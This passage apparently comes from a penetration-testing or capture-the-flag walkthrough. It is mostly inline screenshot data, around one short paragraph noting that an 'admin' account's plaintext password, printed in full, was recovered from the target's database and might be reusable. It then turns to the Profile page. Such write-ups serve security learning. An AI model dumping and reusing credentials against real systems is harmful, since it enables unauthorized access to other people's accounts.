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) We see two users: one with username `user` that we created, and another with username `admin`, password `*)(@skdnaj238374834**__**=`, and email `[email protected]`. The password appears to be in plaintext (doesn't look like a hash) so might work as-is! Let's keep that in mind. Having exhuasted what we can from the database, let's take a look at the Profile page. ![](data:image/png;base64,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